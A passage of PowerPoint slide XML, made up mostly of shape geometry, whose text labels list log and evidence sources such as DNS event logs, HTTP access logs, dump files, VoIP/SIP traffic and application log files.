                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="ECECE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127964" y="4281644"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679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127964" y="4281644"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="324772" y="324772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FAE3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507736" y="3692651"/>
              <a:ext cx="5241290" cy="4006850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5241290" h="4006850">
                  <a:moveTo>
                    <a:pt x="1256601" y="536054"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1249324" y="502221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229106" y="472186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202778" y="454977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172121" y="449237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140498" y="454977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111237" y="472186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691388" y="48768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="48768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="79375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681101" y="79375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095883" y="492633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085329" y="520852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084364" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093000" y="577329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111237" y="599821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138377" y="619899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170813" y="626592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204188" y="619899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234186" y="599821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251394" y="569861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256601" y="536054"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5241290" h="4006850">
                  <a:moveTo>
                    <a:pt x="1299273" y="3518090"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1294066" y="3484207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276858" y="3454146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246860" y="3434003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213485" y="3427285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181049" y="3434003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1153922" y="3454146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135672" y="3476675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1127036" y="3504019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128001" y="3533292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138555" y="3561588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723773" y="3975862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42672" y="3975862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42672" y="4006596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734060" y="4006596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1153922" y="3582035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183170" y="3599332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214793" y="3605085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1245450" y="3599332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271778" y="3582035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1291996" y="3551986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299273" y="3518090"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5241290" h="4006850">
                  <a:moveTo>
                    <a:pt x="5241036" y="3853942"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4559935" y="3853942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4145153" y="3439668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4155694" y="3411372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4156659" y="3382099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4148023" y="3354755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4129786" y="3332226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4102646" y="3312083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4070223" y="3305365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4036834" y="3312083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4006850" y="3332226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989628" y="3362287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3984434" y="3396170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3991699" y="3430066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011930" y="3460115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4038244" y="3477412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4068902" y="3483165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4100525" y="3477412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4129786" y="3460115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4549648" y="3884676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5241036" y="3884676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5241036" y="3853942"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5241290" h="4006850">
                  <a:moveTo>
                    <a:pt x="5241036" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4549648" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4129786" y="424561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4100525" y="407276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4068902" y="401510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4038244" y="407276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011930" y="424561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3991699" y="454621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3984434" y="488505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989628" y="522401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4006850" y="552450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4036834" y="572604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4070223" y="579310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4102646" y="572604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4129786" y="552450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4148023" y="529932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4156659" y="502589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4155694" y="473316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4145153" y="445008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4559935" y="30734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5241036" y="30734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5241036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36179" y="4954524"/>
              <a:ext cx="1248155" cy="124815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129533" y="3494278"/>
            <a:ext cx="19881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65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>logs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970768" y="3359277"/>
            <a:ext cx="1724025" cy="69723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39065" marR="5080" indent="-127000">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>logs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025885" y="7343902"/>
            <a:ext cx="142875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10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Dump</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>files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22905" y="7197979"/>
            <a:ext cx="3050540" cy="103251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ctr" marL="12065" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>VoIP </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>managers </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Initiation </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="85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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25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14">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(SIP)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>traffic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99708" y="306451"/>
            <a:ext cx="36556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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Files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36691" y="760476"/>
            <a:ext cx="5254752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156650" y="1656588"/>
            <a:ext cx="5862955" cy="3058795"/>
            <a:chOff x="2156650" y="1656588"/>
            <a:chExt cx="5862955" cy="3058795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2170938" y="2173986"/>
              <a:ext cx="5834380" cy="2527300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5834380" h="2527300">
                  <a:moveTo>
                    <a:pt x="0" y="421132"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2833" y="372027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11124" y="324585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24556" y="279120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42812" y="235949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65576" y="195389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92533" y="157755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123364" y="123364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157755" y="92533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195389" y="65576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235949" y="42812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279120" y="24556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324585" y="11124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372027" y="2833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421131" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5412740" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5461844" y="2833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5509286" y="11124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5554751" y="24556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5597922" y="42812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5638482" y="65576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5676116" y="92533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5710507" y="123364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5741338" y="157755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5768295" y="195389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5791059" y="235949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5809315" y="279120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5822747" y="324585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5831038" y="372027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5833871" y="421132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5833871" y="2105660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5831038" y="2154764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5822747" y="2202206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5809315" y="2247671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5791059" y="2290842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5768295" y="2331402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5741338" y="2369036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5710507" y="2403427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5676116" y="2434258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5638482" y="2461215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5597922" y="2483979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5554751" y="2502235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5509286" y="2515667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5461844" y="2523958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5412740" y="2526792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421131" y="2526792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372027" y="2523958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324585" y="2515667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279120" y="2502235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235949" y="2483979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195389" y="2461215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157755" y="2434258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123364" y="2403427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92533" y="2369036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65576" y="2331402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42812" y="2290842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24556" y="2247671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11124" y="2202206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833" y="2154764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2105660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="421132"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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560320" y="1656588"/>
              <a:ext cx="5053965" cy="821690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5053965" h="821689">
                  <a:moveTo>
                    <a:pt x="4916678" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="136906" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93650" y="6983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56071" y="26428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26428" y="56071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6983" y="93650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="136905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="684529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6983" y="727785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26428" y="765364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56071" y="795007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93650" y="814452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136906" y="821435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4916678" y="821435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4959933" y="814452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4997512" y="795007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5027155" y="765364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5046600" y="727785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5053583" y="684529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5053583" y="136905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5046600" y="93650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5027155" y="56071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4997512" y="26428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4959933" y="6983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4916678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2422398" y="1871599"/>
            <a:ext cx="4739640" cy="23044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588010">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
